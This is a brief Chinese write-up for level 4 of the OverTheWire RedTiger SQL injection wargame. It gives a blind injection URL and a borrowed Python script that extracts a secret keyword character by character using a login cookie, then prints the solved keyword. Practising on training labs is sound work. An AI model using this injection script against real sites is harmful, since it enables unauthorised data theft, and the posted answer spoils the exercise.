redtiger.labs.overthewire.org/level4.php?id=1
根据Query returned 0 rows. 或Query return 1 rows.进行盲注
http://redtiger.labs.overthewire.org/level4.php?id=1 and (select length(keyword)=21 from level4_secret)
无奈脚本写的太烂,借用一下大佬的脚本
1 import requests 2 import string 3 import re 4 5 keword='' 6 char=string.printable 7 url='http://redtiger.labs.overthewire.org/level4.php?id=1 and 1=(select ascii(substr((select keyword from level4_secret),{0},1))={1})' 8 cookie={'level4login':'there_is_no_bug'} 9 for i in range(1,22): 10 for c in char: 11 test=url.format(i,ord(c)) 12 r=requests.get(test,cookies=cookie) 13 if re.findall('Query returned 1 rows.',r.text): 14 print i,c 15 keword+=c 16 print keword
得到keyword
killstickswithbr1cks!